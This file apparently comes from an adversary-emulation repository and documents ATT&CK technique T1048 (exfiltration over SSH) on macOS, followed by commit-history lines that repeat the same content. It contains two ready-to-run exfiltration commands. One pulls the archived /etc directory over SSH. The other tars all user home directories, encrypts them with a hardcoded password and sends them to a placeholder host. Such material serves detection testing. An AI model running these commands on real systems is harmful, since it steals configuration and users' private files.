Mac/Exfiltration/Exfiltration_Over_Alternative_Protocol.md

## Exfiltration Over Alternative Protocol

MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)

### SSH

Remote to Local:

    ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz

Local to Remote:

    tar czpf - /Users/* | openssl des3 -salt -pass pass:1234 | ssh foo@example.com 'cat > /Users.tar.gz.enc'
Update Exfiltration_Over_Alternative_Protocol.md 2018-02-08 06:53:06 -06:00			`## Exfiltration Over Alternative Protocol`
add first pass at SSH exfiltration 2018-02-08 17:01:34 +11:00
			`MITRE ATT&CK Technique: [T1048](https://attack.mitre.org/wiki/Technique/T1048)`

			`### SSH`

			`Remote to Local:`

			`ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz`

			`Local to Remote:`

			`tar czpf - /Users/* \| openssl des3 -salt -pass pass:1234 \| ssh foo@example.com 'cat > /Users.tar.gz.enc'`